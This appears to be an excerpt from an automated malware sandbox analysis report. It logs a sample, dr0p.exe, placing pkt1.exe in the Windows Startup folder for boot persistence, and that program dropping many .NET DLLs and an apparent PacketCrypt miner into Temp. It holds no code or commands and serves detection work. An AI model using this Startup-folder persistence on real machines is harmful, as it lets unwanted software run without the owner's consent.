Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Runtime.Serialization.Formatters.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Net.Primitives.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Data.DataSetExtensions.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Text.Encoding.Extensions.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Linq.Parallel.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Xml.XmlDocument.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Security.Cryptography.Encoding.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Net.WebProxy.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Console.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Net.Requests.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	File created: C:\Users\user\AppData\Local\Temp\packetcrypt.exe	Jump to dropped file

Boot Survival

Drops PE files to the startup folder

Source: C:\Users\user\Desktop\dr0p.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe

Jump to dropped file

Source: C:\Users\user\Desktop\dr0p.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe

Jump to behavior

Source: C:\Users\user\Desktop\dr0p.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe

Jump to behavior

Source: C:\Users\user\Desktop\dr0p.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe

Memory allocated: 1DA4AD70000 memory reserve | memory write watch

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Threading.Timer.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.IO.MemoryMappedFiles.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\Microsoft.CSharp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\Microsoft.VisualBasic.Core.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Configuration.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Data.Common.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\Microsoft.Win32.Primitives.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Security.Cryptography.X509Certificates.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Xml.ReaderWriter.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Linq.Expressions.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Linq.Queryable.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.ComponentModel.Annotations.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Resources.Writer.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.ObjectModel.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Security.SecureString.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Runtime.Handles.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Collections.Immutable.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Threading.Tasks.Dataflow.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Security.Cryptography.OpenSsl.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Runtime.Numerics.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Security.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\Microsoft.VisualBasic.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Threading.Tasks.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Runtime.Serialization.Json.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Net.Http.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Net.WebHeaderCollection.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Reflection.Emit.Lightweight.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Reflection.TypeExtensions.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Dynamic.Runtime.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.IO.Pipes.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Text.Json.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Runtime.CompilerServices.VisualC.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Runtime.Loader.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Diagnostics.Tools.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Threading.Tasks.Extensions.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Security.Principal.Windows.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Runtime.Serialization.Primitives.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Drawing.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Net.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Threading.Tasks.Parallel.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Diagnostics.DiagnosticSource.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Net.Mail.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Formats.Tar.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Xml.Linq.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Private.CoreLib.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Data.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Threading.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.ComponentModel.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Text.Encodings.Web.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Web.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Security.Cryptography.Csp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Runtime.InteropServices.RuntimeInformation.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Security.Cryptography.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Net.Quic.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Net.NetworkInformation.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Web.HttpUtility.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.IO.FileSystem.Primitives.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Diagnostics.StackTrace.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Diagnostics.Process.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Xml.XmlSerializer.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Threading.ThreadPool.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Numerics.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Private.DataContractSerialization.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Diagnostics.Tracing.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Net.Ping.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.ComponentModel.DataAnnotations.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Threading.Thread.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Net.WebSockets.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.IO.UnmanagedMemoryStream.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Reflection.DispatchProxy.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.IO.FileSystem.DriveInfo.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Runtime.Extensions.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Reflection.Extensions.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Reflection.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Resources.Reader.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Collections.NonGeneric.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Xml.XPath.XDocument.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Numerics.Vectors.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.IO.Compression.Brotli.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Core.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.IO.Pipes.AccessControl.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\PacketCryptApp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.ComponentModel.TypeConverter.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\mscorlib.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Xml.XPath.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Transactions.Local.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Reflection.Metadata.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.IO.Compression.ZipFile.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Diagnostics.TextWriterTraceListener.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Threading.Channels.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Security.Cryptography.Primitives.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.IO.FileSystem.AccessControl.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Xml.Serialization.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.IO.Compression.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Runtime.InteropServices.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Reflection.Primitives.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Diagnostics.Debug.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Runtime.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Windows.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\netstandard.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Diagnostics.TraceSource.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.IO.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Collections.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.ServiceProcess.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Buffers.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Runtime.Serialization.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Xml.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Memory.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Security.Cryptography.Cng.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Text.Encoding.CodePages.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.ComponentModel.Primitives.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Runtime.InteropServices.JavaScript.dll	Jump to dropped file
